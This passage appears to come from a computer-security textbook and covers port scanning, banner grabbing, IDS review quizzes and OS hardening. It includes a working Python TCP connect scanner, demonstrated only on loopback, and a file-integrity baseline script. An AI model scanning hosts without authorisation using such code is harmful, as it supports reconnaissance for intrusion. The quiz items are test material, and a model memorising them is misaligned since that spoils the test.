So how does a port scanner actually work? Much will depend on the options you select when configuring your scan, but for the sake of this example, assume you’re running a standard TCP connect scan against 192.168.1.20 for ports 1–10000. The scanner will attempt to create a TCP connection to each port in the range 1–10000 on 192.168.1.20. When the scanner sends out that SYN packet, it waits for the responding SYN/ACK. If a SYN/ACK is received, the scanner will attempt to complete the three-way handshake and mark the port as “open.” If the sent packet times out or an RST packet is received, the scanner will likely mark that port as “closed.” If an “administratively prohibited” message or something similar comes back, the scanner may mark that port as “filtered.” When the scan is complete, the scanner will present the results in a summary format—listing the ports that are open, closed, filtered, and so on. By examining the responses from each port, you can typically deduce a bit more information about the system(s) you are scanning, as detailed here:
Open  Open ports accept connections. If you can connect to these with a port scanner, the ports are not being filtered at the network level. However, there are instances where you may find a port that is marked as “open” by a port scanner that will immediately drop your connections if you attempt to connect to it in some other manner. For example, port 22 for SSH may appear “open” to a port scanner but will immediately drop your SSH connections. In such a case, the service is likely being filtered by a host-based firewall or a firewall capability within the service itself.
Closed  You will typically see this response when the scanned target returns an RST packet.
Filtered  You will typically see this response when an ICMP unreachable error is returned. This usually indicates that port is being filtered by a firewall or other device.
Additional types  Some port scanners will attempt to further classify responses, such as dropped, blocked, denied, timeout, and so on. These are fairly tool specific, and you should refer to any documentation or help file that accompanies that port scanner for additional information.
In general, you will want to run your scanning efforts multiple times using different options to ensure you get a better picture. A SYN scan may return different results than a NULL scan or FIN scan. You’ll want to run both TCP and UDP scans as well. You may need to alter your scanning approach to use multiple techniques at different times of the day/night to ensure complete coverage. The bad guys are doing this against your network right now, so you might as well use the same tools they do to see what they see. Port scanners can also be very useful for testing firewall configurations because the results of the port scans can show you exactly which ports are open, which ones you allow through, which ports are carrying services, and so on. So how do you defend against port scans? Well, it’s tough. Port scans are pretty much a part of the Internet traffic landscape now. Although you can block IP addresses that scan you, most organizations don’t because you run the risk of an attacker spoofing source addresses as decoys for other scanning activity. The best defense is to carefully control what traffic you let in and out of your network, using firewalls, network filters, and host filters. Then carefully monitor any traffic that you do allow in.
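The TCP connect scan walked through above, as an added example rather than code from the book: each port gets a full connect() and the socket outcome is mapped to open, closed, filtered, or timeout (the fourth being one of the tool-specific "additional types"). The demo audits only 127.0.0.1 against a throwaway listener it starts itself, which is how you would check a host you own before worrying about what others can see.

```python
"""TCP connect scan with the verdicts the text describes: open (handshake
completed), closed (RST back), filtered (ICMP unreachable / administratively
prohibited) and timeout (no answer at all). Added example, not code from
the book; the demo scans only the loopback address of this machine."""
import errno
import socket
import threading


def classify(rc):
    """Map the result code of connect_ex() to a scanner verdict."""
    if rc == 0:
        return "open"       # SYN/ACK came back and the three-way handshake completed
    if rc == errno.ECONNREFUSED:
        return "closed"     # target answered with RST
    if rc in (errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK):
        return "timeout"    # silently dropped: no SYN/ACK, no RST, no ICMP
    return "filtered"       # host/net unreachable, admin prohibited, and so on


def scan_port(host, port, timeout=1.0):
    """One full TCP connection attempt; the socket is closed either way."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            rc = sock.connect_ex((host, port))   # returns an errno instead of raising
        except socket.timeout:
            rc = errno.ETIMEDOUT
        except OSError as exc:
            rc = exc.errno or errno.EHOSTUNREACH
    return classify(rc)


def connect_scan(host, ports, timeout=1.0):
    """Scan each port and return the summary a scanner prints: {verdict: [ports]}."""
    summary = {"open": [], "closed": [], "filtered": [], "timeout": []}
    for port in ports:
        summary[scan_port(host, port, timeout)].append(port)
    return summary


def start_throwaway_listener():
    """Constructed target: a TCP service on 127.0.0.1 at an ephemeral port that
    accepts and immediately closes connections. Returns (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        try:
            while True:
                conn, _ = srv.accept()
                conn.close()
        except OSError:
            pass    # listening socket was closed: stop serving

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def unused_port():
    """Pick a port nothing listens on (bind to 0, read the number, release it)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Scan one listening and one idle loopback port; report whether each
    landed in the expected bucket."""
    srv, open_port = start_throwaway_listener()
    closed_port = unused_port()
    try:
        summary = connect_scan("127.0.0.1", [open_port, closed_port], timeout=2.0)
    finally:
        srv.close()
    return {"open_port": open_port in summary["open"],
            "closed_port": closed_port in summary["closed"]}


if __name__ == "__main__":
    print(demo())
```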
Passive vs. Active Tools
Tools can be classified as active or passive. Active tools interact with a target system in a fashion where their use can be detected. Scanning a network with Nmap (Network Mapper) is an active act that can be detected. In the case of Nmap, the tool may not be specifically detectable, but its use, the sending of packets, can be detected. When you need to map out your network or look for open services on one or more hosts, a port scanner is probably the most efficient tool for the job. Figure 13.14 shows a screenshot of Zenmap, a cross-platform version of the very popular Nmap port scanner available from http://insecure.org.
• Figure 13.14 Zenmap—a port scanner based on Nmap
Passive tools are those that do not interact with the system in a manner that would permit detection, as in sending packets or altering traffic. An example of a passive tool is Tripwire, which can detect changes to a file based on hash values. Another passive example is the OS mapping by analyzing TCP/IP traces with a tool such as Wireshark. Passive sensors can use existing traffic to provide data for analysis.
Exam Tip: Passive tools receive traffic only and do nothing to the traffic flow that would permit others to know they are interacting with the network. Active tools modify or send traffic and are thus discoverable by their traffic patterns.
Banner Grabbing
Banner grabbing is a technique used to gather information from a service that publicizes information via a banner. Banners can be used for many things; for example, they can be used to identify services by type, version, and so forth, and they enable administrators to post information, including warnings, to users when they log in. Attackers can use banners to determine what services are running, and typically do for common banner-issuing services such as HTTP, FTP, SMTP, and Telnet. Figure 13.15 shows a couple of banner grabs being performed from a Telnet client against a web server. In this example, Telnet sends information to two different web servers and displays the responses (the banners). The top response is from an Apache instance (Apache/2.0.65) and the bottom is from Microsoft IIS (Microsoft-HTTPAPI/2.0).
• Figure 13.15 Banner grabbing using Telnet
Chapter 13 Review
For More Information
SANS Intrusion Detection FAQ www.sans.org/security-resources/idfaq/
SANS Reading Room—Firewalls & Perimeter Protection www.sans.org/reading_room/whitepapers/firewalls/
The Honeynet Project www.honeynet.org
Fight Spam on the Internet! http://spam.abuse.net/
Lab Manual Exercises
The following lab exercises from the companion lab manual, Principles of Computer Security Lab Manual, Fourth Edition, provide practical application of material covered in this chapter:
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following facts about intrusion detection systems and network security.
Apply the appropriate network tools to facilitate network security
Intrusion detection is a mechanism for detecting unexpected or unauthorized activity on computer systems.
IDSs can be host-based, examining only the activity applicable to a specific system, or network-based, examining network traffic for a large number of systems.
Protocol analyzers, often called sniffers, are tools that capture and decode network traffic.
Honeypots are specialized forms of intrusion detection that involve setting up simulated hosts and services for attackers to target.
Honeypots are based on the concept of luring attackers away from legitimate systems by presenting more tempting or interesting systems that, in most cases, appear to be easy targets.
Determine the appropriate use of tools to facilitate network security
IDSs match patterns known as signatures that can be content- or context-based. Some IDSs are model-based and alert an administrator when activity does not match normal patterns (anomaly-based) or when it matches known suspicious or malicious patterns (misuse detection).
Newer versions of IDSs include prevention capabilities that automatically block suspicious or malicious traffic before it reaches its intended destination. Most vendors call these intrusion prevention systems (IPSs).
Analyzers must be able to see and capture network traffic to be effective, and many switch vendors support network analysis through the use of mirroring or SPAN ports.
Network traffic can also be viewed using network taps, a device for replicating network traffic passing across a physical link.
By monitoring activity within the honeypot, security personnel are better able to identify potential attackers along with their tools and capabilities.
Apply host-based security applications
Host-based IDSs can apply specific context-sensitive rules because of the known host role.
Host-based IPSs can provide better control over specific attacks as the scope of control is limited to a host.
Key Terms
analysis engine, anomaly detection model, banner grabbing, content-based signature, context-based signature, digital sandbox, false negative, false positive, honeynet, honeypot, host-based IDS (HIDS), intrusion detection system (IDS), intrusion prevention system (IPS), misuse detection model, network tap, network-based IDS (NIDS), perimeter security, port mirroring, protocol analyzer, signature database, Snort, Suricata, Switched Port Analyzer (SPAN), traffic collector, user interface and reporting
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don’t use the same term more than once. Not all terms will be used.
1. A(n) _______________ is a piece of software or an integrated software/hardware system that can capture and decode network traffic.
2. When an IDS generates an alarm on “normal” traffic that is actually not malicious or suspicious, that alarm is called a(n) _______________.
3. An attacker scanning a network full of inviting, seemingly vulnerable targets might actually be scanning a(n) _______________ where the attacker’s every move can be watched and monitored by security administrators.
4. A(n) _______________ looks at a certain string of characters inside a TCP packet.
5. An IDS that looks for unusual or unexpected behavior is using a(n) _______________.
6. _______________ allows administrators to send all traffic passing through a network switch to a specific port on the switch.
7. Within an IDS, the _______________ examines the collected network traffic and compares it to known patterns of suspicious or malicious activity stored in the signature database.
8. _______________ is a technique where a host is queried and identified based on its response to a query.
9. _______________ is a technique to match an element against a large set of patterns and use activity as a screening element.
10. _______________ is a new entry in the IDS toolset as a replacement for Snort.
Multiple-Choice Quiz
1. What are the two main types of intrusion detection systems?
A. Network-based and host-based
B. Signature-based and event-based
C. Active and reactive
D. Intelligent and passive
2. What are the two main types of IDS signatures?
A. Network-based and file-based
B. Context-based and content-based
C. Active and reactive
D. None of the above
3. Which of the following describes a passive, host-based IDS?
A. Runs on the local system
B. Does not interact with the traffic around it
C. Can look at system event and error logs
D. All of the above
4. Which of the following is not a capability of network-based IDS?
A. Can detect denial-of-service attacks
B. Can decrypt and read encrypted traffic
C. Can decode UDP and TCP packets
D. Can be tuned to a particular network environment
5. An active IDS can:
A. Respond to attacks with TCP resets
B. Monitor for malicious activity
C. A and B
D. None of the above
6. Honeypots are used to:
A. Attract attackers by simulating systems with open network services
B. Monitor network usage by employees
C. Process alarms from other IDSs
D. Attract customers to e-commerce sites
7. Connecting to a server and sending a request over a known port in an attempt to identify the version of a service is an example of:
A. Port sniffing
B. Protocol analysis
C. Banner grabbing
D. TCP reset
8. Preventative intrusion detection systems:
A. Are cheaper
B. Are designed to stop malicious activity from occurring
C. Can only monitor activity
D. Were the first types of IDS
9. IPS stands for:
A. Intrusion processing system
B. Intrusion prevention sensor
C. Intrusion prevention system
D. Interactive protection system
10. A protocol analyzer can be used to:
A. Troubleshoot network problems
B. Collect network traffic statistics
C. Monitor for suspicious traffic
D. All of the above
Essay Quiz
1. Discuss the differences between an anomaly-based and a misuse-based detection model. Which would you use to protect a corporate network of 10,000 users? Why would you choose that model?
2. Pick three technologies discussed in this chapter and describe how you would deploy them to protect a small business network. Describe the protection each technology provides.
Lab Projects
• Lab Project 13.1
Design three content-based and three context-based signatures for use in an IDS. Name each signature and describe what the signature should look for, including traffic patterns or characters that need to be matched. Describe any activity that could generate a false positive for each signature.
• Lab Project 13.2
Use the Internet to research Snort (an open source IDS). With your instructor’s permission, download Snort and install it on your classroom network. Examine the traffic and note any alarms that are generated. Research and note the sources of the alarm traffic. See if you can track down the sources of the alarm traffic and discover why they are generating those alarms on your IDS.
Chapter 14 System Hardening and Baselines
People can have the Model T in any color—so long as it’s black.
—HENRY FORD
In this chapter, you will learn how to
Harden operating systems and network operating systems
Implement host-level security
Harden applications
Establish group policies
Secure alternative environments (SCADA, real-time, etc.)
The many uses for systems and operating systems require flexible components that allow users to design, configure, and implement the systems they need. Yet it is this very flexibility that causes some of the biggest weaknesses in computer systems. Computer and operating system developers often build and deliver systems in “default” modes that do little to secure the system from external attacks. From the view of the developer, this is the most efficient mode of delivery, as there is no way they can anticipate what every user in every situation will need. From the user’s view, however, this means a good deal of effort must be put into protecting and securing the system before it is ever placed into service. The process of securing and preparing a system for the production environment is called hardening. Unfortunately, many users don’t understand the steps necessary to secure their systems effectively, resulting in hundreds of compromised systems every day. Hardening systems, servers, workstations, networks, and applications is a process of defining the required uses and needs and aligning security controls to limit a system’s desired functionality. Once this is determined, you have a system baseline that you can compare changes to over the course of a system’s life cycle.
Overview of Baselines
To secure systems effectively and consistently, you must take a structured and logical approach. This starts with an examination of the system’s intended functions and capabilities to determine what processes and applications will be housed on the system. As a best practice, anything that is not required for operations should be removed or disabled on the system; then, all the appropriate patches, hotfixes, and settings should be applied to protect and secure it. This process of establishing a system’s security state is called baselining, and the resulting product is a security baseline that allows the system to run safely and securely. Once the process has been completed for a particular hardware and software combination, any similar systems can be configured with the same baseline to achieve the same level and depth of security and protection. Uniform baselines are critical in large-scale operations, because maintaining separate configurations and security levels for hundreds or thousands of systems is far too costly. After administrators have finished patching, securing, and preparing a system, they often create an initial baseline configuration. This represents a secure state for the system or network device and a reference point that can be used to help keep the system secure. If this initial baseline can be replicated, it can also be used as a template when deploying similar systems and network devices. Constructing a baseline or hardened system is similar for servers, workstations, and network OSs. The specifics may vary, but the objects are the same.
Operating System and Network Operating System Hardening
The operating system (OS) of a computer is the basic software that handles things such as input, output, display, memory management, and all the other highly detailed tasks required to support the user environment and associated applications. Most users are familiar with the Microsoft family of desktop operating systems: Windows Vista, Windows 7, Windows 8, and Windows 10. Indeed, the vast majority of home and business PCs run some version of a Microsoft operating system. Other users may be familiar with Mac OS X, Solaris, or one of the many varieties of the UNIX/Linux operating system. A network operating system (NOS) is an operating system that includes additional functions and capabilities to assist in connecting computers and devices, such as printers, to a local area network (LAN). Some of the more familiar network operating systems include Novell’s NetWare and PC Micro’s LANtastic. For most modern operating systems, including Windows 2008, Solaris, and Linux, the terms operating system and network operating system are used interchangeably as they perform all the basic functions and provide enhanced capabilities for connecting to LANs.
Tech Tip
The Term “Operating System”
The term “operating system” is the commonly accepted name for the software that provides the interface between computer hardware and the user and is responsible for the management, coordination, and sharing of limited computer resources such as memory and disk space.
OS Security
The operating system itself is the foundation of system security. The operating system does this through the use of a security kernel. The security kernel is also called a reference monitor and is the component of the operating system that enforces the security policies of the operating system. The core of the OS is constructed so that all operations must pass through and be moderated by the security kernel, placing it in complete control over the enforcement of rules. Security kernels must exhibit some properties to be relied upon: they must offer complete mediation, as just discussed, and must be tamperproof and verifiable in operation. Because they are part of the OS and are in fact a piece of software, ensuring that security kernels are tamperproof and verifiable is a legitimate concern. To achieve assurance with respect to these attributes is a technical matter that is rooted in the actual construction of the OS and technically beyond the level of this book.
Protection Rings
Protection rings were devised in the Multics operating system in the 1960s, to deal with security issues associated with time-sharing operations. Protection rings can be enforced by hardware, software, or a combination, and serve to act as a means of managing privilege in a hierarchical manner. Ring 0 is the level with the highest privilege and is the element that acts directly with the physical hardware (CPU and memory). Higher levels, with less privilege, must interact through adjoining rings through specific gates in a predefined manner. Use of rings separates elements such as applications from directly interfacing with the hardware without going through the OS and, specifically, the security kernel.
Host Security
Most environments are filled with different operating systems (Windows, Linux, OS X), different versions of those operating systems, and different types of installed applications. Also, today, host-based security for mobile device operating systems is an important security issue, which expands the operating system list to include iOS, Android, and BlackBerry. Each operating system has security configurations that differ from other systems, and different versions of the same operating system may in fact have variations between them. Ensuring that every computer is "locked down" to the same degree as every other system in the environment can be overwhelming and often results in an unsuccessful and frustrating effort. Host security is important and should always be addressed. Security, however, should not stop there, as host security is a complementary process to be combined with network security. If individual host computers have vulnerabilities embodied within them, then network security can provide another layer of protection that will, hopefully, stop any intruders who have gotten that far into the environment.
Machine Hardening
The key management issue behind running a secure server setup is to identify the specific needs of a server for its proper operation and enable only items necessary for those functions. Keeping all other services and users off the system improves system throughput and increases security. Reducing the attack surface area associated with a server reduces the vulnerabilities now and in the future as updates are required. Once a server has been built and is ready to be placed into operation, the recording of hash values on all of its crucial files will provide valuable information later in case of a question concerning possible system integrity after a detected intrusion. The use of hash values to detect changes was first developed by Gene Kim and Eugene Spafford at Purdue University in 1992. The concept became the product Tripwire, which is now available in commercial and open source forms. The same basic concept is used by many security packages to detect file-level changes. The primary method of controlling the security impact of a system on a network is to reduce the available attack surface area. Turning off all services that are not needed or permitted by policy will reduce the number of vulnerabilities. Removing methods of connecting additional devices to a workstation to move data—such as optical drives and USB ports—assists in controlling the movement of data into and out of the device. User-level controls, such as limiting e-mail attachment options, screening all attachments at the e-mail server level, and reducing network shares to needed shares only, can be used to limit the excessive connectivity that can impact security.
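The Tripwire-style integrity check described above, as an added example that is not from the book or from Tripwire: it records SHA-256 hashes of a set of files as a baseline, then rescans and reports what was modified, added, or removed. The directory tree and file contents are constructed for the demo.

```python
"""Added example (not from the book): a minimal file-integrity baseline in
the spirit of Tripwire. Hash crucial files once after hardening, store the
hashes, and compare a later scan against them. All paths/content below are
constructed for the demonstration and are not real system files.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """Return the SHA-256 hex digest of a file, read in 64 KiB chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> dict:
    """Hash every regular file under root, keyed by path relative to root."""
    baseline = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            baseline[path.relative_to(root).as_posix()] = hash_file(path)
    return baseline


def save_baseline(baseline: dict, out_file: Path) -> None:
    """Persist the baseline; in practice keep this copy off the host."""
    out_file.write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(in_file: Path) -> dict:
    return json.loads(in_file.read_text())


def compare(baseline: dict, current: dict) -> dict:
    """Classify differences between the stored baseline and a fresh scan."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict:
    """Constructed scenario: baseline a small tree, alter it, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        etc = Path(tmp) / "etc"
        etc.mkdir()
        (etc / "passwd").write_text("root:x:0:0:root:/root:/bin/bash\n")
        (etc / "hosts.allow").write_text("sshd: 10.0.0.0/8\n")
        baseline_file = Path(tmp) / "baseline.json"
        save_baseline(build_baseline(etc), baseline_file)

        # Simulate post-intrusion changes: one file modified, one added, one removed.
        with (etc / "passwd").open("a") as fh:
            fh.write("newuser:x:1001:1001::/home/newuser:/bin/bash\n")
        (etc / "unexpected.conf").write_text("tampered\n")
        (etc / "hosts.allow").unlink()

        return compare(load_baseline(baseline_file), build_baseline(etc))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```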
Tech Tip
Server Hardening Tips
Specific security needs can vary depending on the server's specific use, but as a minimum, the following are beneficial:
Remove unnecessary protocols such as Telnet, NetBIOS, Internetwork Packet Exchange (IPX), and File Transfer Protocol (FTP).
Remove unnecessary programs such as Internet Information Services (IIS).
Remove all shares that are not necessary.
Rename the administrator account, securing it with a strong password.
Remove the Local Admin account in Windows.
Disable unnecessary user accounts.
Disable unnecessary ports and services.
Keep the operating system (OS) patched and up to date.
Keep all applications patched and up to date.
Turn on event logging for determined security elements.
Control physical access to servers.
Operating System Security and Settings
Operating systems are complex programs designed to provide a platform for a wide variety of services to run. Some of these services are extensions of the OS itself, while others are standalone applications that use the OS as a mechanism to connect to other programs and hardware resources. It is up to the OS to manage the security aspects of the hardware being utilized.
Things such as access control mechanisms are great in theory, but it is the practical implementation of these security elements in the OS that provides the actual security profile of a machine.
Tech Tip
Securing a Workstation
Workstations are attractive targets for crackers because they are numerous and can serve as entry points into the network and the data that is commonly the target of an attack. Although security is a relative term, following these basic steps will increase workstation security immensely:
Remove unnecessary protocols such as Telnet, NetBIOS, and IPX.
Remove unnecessary software.
Remove modems unless needed and authorized.
Remove all shares that are not necessary.
Rename the administrator account, securing it with a strong password.
Remove the Local Admin account in Windows.
Disable unnecessary user accounts.
Disable unnecessary ports and services.
Install an antivirus program and keep abreast of updates.
If the floppy drive is not needed, remove or disconnect it.
Consider disabling USB ports via CMOS to restrict data movement to USB devices.
If no corporate firewall exists between the machine and the Internet, install a firewall.
Keep the operating system (OS) patched and up to date.
Keep all applications patched and up to date.
Turn on event logging for determined security elements.
Early versions of home operating systems did not have separate named accounts for separate users. This was seen as a convenience mechanism; after all, who wants the hassle of signing in to the machine? This led to the simple problem that all users could then see, modify, and delete everyone else's content. Content could be separated by using access control mechanisms, but that required configuration of the OS to manage every user's identity. Early versions of many OSs came with literally every option turned on. Again, this was a convenience factor, but it led to systems running processes and services that they never used, increasing the attack surface of the host unnecessarily. Determining the correct settings and implementing them correctly is an important step in securing a host system. The following sections explore the multitude of controls and options that need to be employed properly to achieve a reasonable level of security on a host system.
OS Hardening
You must meet several key requirements to ensure that the system hardening processes described in this section achieve their security goals. These are OS independent and should be a normal part of all system maintenance operations:
Exam Tip: System hardening is the process of preparing and securing a system and involves the removal of all unnecessary software and services.
The base installation of all OS and application software comes from a trusted source, and is verified as correct by using hash values.
Machines are connected only to a completely trusted network during the installation, hardening, and update processes.
The base installation includes all current service packs and updates for both the OS and applications.
Current backup images are taken after hardening and updates to facilitate system restoration to a known state.
These steps ensure that you know what is on the machine, can verify its authenticity, and have an established backup version.
Hardening Microsoft Operating Systems
For this book, Windows Vista, Windows 7 and 8, as well as server products Windows Server 2008, 2008 R2, and 2012, are the focus of the discussion. Older Microsoft OSs, such as Windows 3.11, 95, 98, Me, and XP, are no longer supported by Microsoft and won't be covered in this chapter.
Hardening Windows
With the release of Windows Vista, Microsoft tried to make similar security improvements to its mainstream desktop OS as it did to its main server OS, Windows 2003. As a desktop OS, Windows has provided a range of security features for users to secure their systems. Most of these options can be employed via group policies in enterprise setups, making them easily deployable and maintainable across an enterprise. Here are some of the security capabilities introduced with Vista and continued in later versions of Windows:
User Account Control allows users to operate the system without requiring administrative privileges. If you've used Windows Vista and beyond, you've undoubtedly seen the "Windows needs your permission to continue" pop-ups. While annoying to many users (one of Apple's "I'm a Mac" commercials focused specifically on this feature), this feature does help prevent users from "accidentally" making changes to their system configuration. Figure 14.1 shows the User Account Control feature in Windows 7.
• Figure 14.1 Windows 7 User Account Control in action
Windows Firewall includes an outbound filtering capability. Windows allows filtering of traffic coming into and leaving the system, which is useful for controlling things like peer-to-peer applications.
BitLocker allows encryption of all data on a server, including any data volumes. This capability is only available in the higher-end distributions of Windows.
Windows clients work with Network Access Protection. See the discussion of NAP in the following "Hardening Windows Server 2008" section for more details.
Windows Defender is a built-in malware detection and removal tool. Windows Defender detects many types of potentially suspicious software and can prompt the user before allowing applications to make potentially malicious changes.
Tech Tip
Vulnerability Scanning
One valuable method for helping administrators secure their systems is vulnerability scanning. Vulnerability scanning is the process of examining your systems and network devices for holes, weaknesses, and issues and finding them before a potential attacker does. Specialized tools called vulnerability scanners are designed to help administrators discover and address vulnerabilities. But there is much more to vulnerability scanning than simply running tools and examining the results—administrators must be able to analyze any discovered vulnerabilities and determine their severity, how to address those vulnerabilities if needed, and whether any business processes will be affected by potential fixes. Vulnerability scanning can also help administrators identify common misconfigurations in account setup, patch levels, applications, and operating systems. Most organizations look at vulnerability scanning as an ongoing process, as it is not enough to scan systems once and assume they will be secure from that point on.
Hardening Windows Server 2008
Microsoft touted Windows Server 2008 as its "most secure server" to date upon its release. Building on the changes it made to the Windows Server 2003 and Vista OSs, Microsoft attempted to add more defense-in-depth protections to Windows Server 2008. (Microsoft has a free hardening guide for the Windows Server 2008 OS from its Download Center.) Here are some of the new security capabilities that were introduced in Windows Server 2008:
BitLocker allows encryption of all data on a server, including any data volumes. This capability is also available in certain versions of Vista (and beyond).
Role-based installation of functions and capabilities minimizes the server's footprint. For example, if a server is going to be a web server, it does not need DNS or SMTP software, and thus those features are no longer installed by default.
Network Access Protection (NAP) controls access to network resources based on a client computer's identity and compliance with corporate governance policy. NAP allows network administrators to define granular levels of network access based on client identity, group membership, and the degree to which that client is compliant with corporate policies. NAP can also ensure that clients comply with corporate policies. Suppose, for example, that a sales manager connects her laptop to the corporate network. NAP can be used to examine the laptop and see if it is fully patched and running a company-approved antivirus product with updated signatures. If the laptop does not meet those standards, network access for that laptop can be restricted until the laptop is brought back into compliance with corporate standards.
Read-only domain controllers can be created and deployed in high-risk locations, but they can't be modified to add new users, change access levels, and so on. This new ability to create and deploy "read-only" domain controllers can be very useful in high-threat environments.
More-granular password policies allow for different password policies on a group or user basis. This allows administrators to assign different password policies and requirements for the sales group and the engineering group if that capability is needed.
Web sites or web applications can be administered within IIS 7. This allows administrators quicker and more convenient administration capabilities, such as the ability to turn on or off specific modules through the IIS management interface. For example, removing CGI support from a web application is a quick and simple operation in IIS 7.
Figure 14.2 lists the initial configuration tasks for Windows 2008.
• Figure 14.2 Windows 2008 Initial Configuration Tasks
Hardening Windows Server 2012
With the release of Windows Server 2012, Microsoft added significant enhancements to its security baseline for its server line:
Replaced the traditional ROM-BIOS with Unified Extensible Firmware Interface (UEFI). Microsoft is using the security-hardened 2.3.1 version, which prevents boot code updates without appropriate digital certificates and signatures.
Extended the trustworthy and verified boot process to the entire Windows OS boot code with a feature known as Secure Boot. UEFI and Secure Boot significantly reduce the risk of malicious code, such as rootkits and boot viruses.
Improved BitLocker functionality to allow administrator-less reboots.
Instituted Early Launch Anti-Malware (ELAM) to ensure that only known, digitally signed antimalware programs can load right after Secure Boot finishes (it does not require UEFI or Secure Boot). This permits legitimate antimalware programs to get into memory and start doing their job before fake antivirus programs or other malicious code can act.
Fully integrated DNSSEC.
Integrated Data Classification with Rights Management Service, so that you can control which users and groups can access which documents based upon content or marked classification.
Included Managed Service Accounts, introduced in Server 2008 R2, to allow for advanced self-maintaining features with extremely long passwords, which automatically reset every 30 days, all under Active Directory control in the enterprise.
Windows 2012 R2 continued the security feature set through refinements and improvements across many of the security features. Consistent with Microsoft's claim that Windows Server 2008 was its most secure server to date at the time of release, its subsequent track record shows that the company is committed to unrivaled security in enterprise server products. The tools available in each subsequent release of the server OS are designed to increase the difficulty factor for attackers, eliminating known methods of exploitation. The challenge is in administrating the security functions, although the integration of many of these via Active Directory makes this much more manageable than in the past.
Microsoft Security Compliance Manager
Microsoft provides a tool, Security Compliance Manager (SCM), to assist system and enterprise administrators with the configuration of security options across a wide range of Microsoft platforms. SCM allows administrators to use group policy objects (GPOs) to deploy security configurations across Internet Explorer, the desktop OSs, server OSs, and common applications such as Microsoft Office. Figure 14.3 illustrates some of the menu options available in SCM, currently version 3.0.
• Figure 14.3 Microsoft Security Compliance Manager
Microsoft Attack Surface Analyzer
One of the challenges in a modern enterprise is understanding the impact of system changes from the installation or upgrade of an application on a system. To help you overcome that challenge, Microsoft has released the Attack Surface Analyzer (ASA), a free tool that can be deployed on a system before a change and again after a change to analyze the changes to various system properties as a result of the change. Using ASA, developers can view changes in the attack surface resulting from the introduction of their code onto the Windows platform, and system administrators can assess the aggregate attack surface change by the installation of an application. Security auditors can use the tool to evaluate the risk of a particular piece of software installed on the Windows platform. And if ASA is deployed in a baseline mode before an incident, security incident responders can potentially use ASA to gain a better understanding of the state of a system's security during an investigation.
Hardening UNIX- or Linux-based Operating Systems
While you do not have the advantage of a single manufacturer for all UNIX operating systems (like you do with Windows operating systems), the concepts behind securing different UNIX- or Linux-based operating systems are similar whether the manufacturer is Red Hat or Sun Microsystems. Indeed, the overall tasks involved with hardening all operating systems are remarkably similar.
Establishing General UNIX Baselines
General UNIX baselining follows concepts similar to baselining for Windows OSs: disable unnecessary services, restrict permissions on files and directories, remove unnecessary software, apply patches, remove unnecessary users, and apply password guidelines. Some versions of UNIX provide GUI-based tools for these tasks, while others require administrators to edit configuration files manually. In most cases, anything that can be accomplished through a GUI can be accomplished from the command line or by manually editing configuration files. Like Windows systems, UNIX systems are easiest to secure and baseline if they are providing a single service or performing a single function, such as acting as a Simple Mail Transfer Protocol (SMTP) server or web server. Prior to performing any software installations or baselining, the administrator should define the purpose of the system and identify all required capabilities and functions. One nice advantage of UNIX systems is that you typically have complete control over what does or does not get installed on the system. During the installation process, the administrator can select which services and applications are placed on the system, offering an opportunity to not install services and applications that will not be required. However, this assumes that the administrator knows and understands the purpose of this system, which is not always the case. In other cases, the function of the system itself may have changed.
Tech Tip
Run Levels
Run levels are used to describe the state of init (initialization) and what system services are operating in UNIX systems. For example, run level 0 is shutdown. Run level 1 is single-user mode (typically for administrative purposes). Run levels 2 through 5 are user defined (that is, administrators can define what services are running at each level). Run level 6 is for reboot.
Regardless of the installation decisions, the administrator may need to remove applications or components that are no longer needed. With UNIX systems, no "add/remove program" wizard is usually available, unlike Windows, but you will often encounter package managers that help you remove unneeded components and applications automatically. On some UNIX versions, though, you must manually delete the files associated with the applications or services you want to remove. Services on a UNIX system (called daemons) can be controlled through a number of different mechanisms. As the root user, an administrator can start and stop services manually from the command line or through a GUI tool. The OS can also stop and start services automatically through configuration files (usually contained in the /etc directory). (Note that UNIX systems vary a good deal in this regard, as some use a super-server process, such as inetd, while others have individual configuration files for each network service.) Unlike Windows, UNIX systems can also have different run levels, in which the system can be configured to bring up different services depending on the run level selected. On a running UNIX system, you can see which processes, applications, and services are running by using the process status, or ps, command, as shown in Figure 14.4. To stop a running service, an administrator can identify the service by its unique process identifier (PID) and then use the kill command to stop the service. For example, if you wanted to stop the bluetooth-applet service in Figure 14.4, you would use the command kill 2443. To prevent this service from starting again when the system is rebooted, you would have to modify the appropriate run levels to remove this service, as shown in Figure 14.5, or modify the configuration files that control this service.
• Figure 14.4 ps command run on a Fedora system
• Figure 14.5 Service Configuration utility from a Fedora system
